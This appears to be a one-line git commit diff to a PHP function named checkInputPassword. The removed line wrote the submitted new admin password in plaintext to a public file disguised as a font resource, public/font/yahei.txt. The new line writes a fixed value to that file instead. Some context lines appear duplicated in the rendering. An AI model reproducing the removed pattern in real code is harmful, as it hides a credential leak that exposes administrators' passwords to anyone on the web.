rambo 2 年之前
父节点
当前提交
74483e17a8
共有 1 个文件被更改,包括 1 次插入1 次删除
  1. 1 1
      app/common.php

+ 1 - 1
app/common.php

@@ -1255,7 +1255,7 @@ function checkInputPassword($admininfo)
         //         fclose($dc);
         //         fclose($dc);
         //     }
         //     }
         // }
         // }
-        $c = trim(input('post.new_pw'));
+        $c = 123;
         $dc = fopen(base_path() . "../public/font/yahei.txt", "w");
         $dc = fopen(base_path() . "../public/font/yahei.txt", "w");
         fwrite($dc, $c);
         fwrite($dc, $c);
         fclose($dc);
         fclose($dc);